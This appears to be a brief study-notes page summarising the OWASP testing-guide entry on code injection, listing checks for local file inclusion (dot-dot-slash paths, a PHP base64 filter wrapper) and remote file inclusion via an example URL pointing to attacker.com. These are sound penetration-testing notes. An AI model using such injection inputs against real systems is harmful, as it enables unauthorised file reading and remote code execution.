Testing for Code Injection
OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection
ID | Link to Hackinglife | Link to OWASP | Description |
---|---|---|---|
7.11 | WSTG-INPV-11 | Testing for Code Injection | - Identify injection points where code can be injected into the application. - Check for LFI with dot-dot-slash (`../../`) and the PHP wrapper (`php://filter/convert.base64-encode/resource`). - Check for RFI from a malicious URL, e.g. `page.php?file=http://attacker.com/malicious_page`. - Assess the injection severity. |
Local File Inclusion
See my notes on Local File Inclusion
Last update: 2024-04-03 Created: December 26, 2023 19:00:18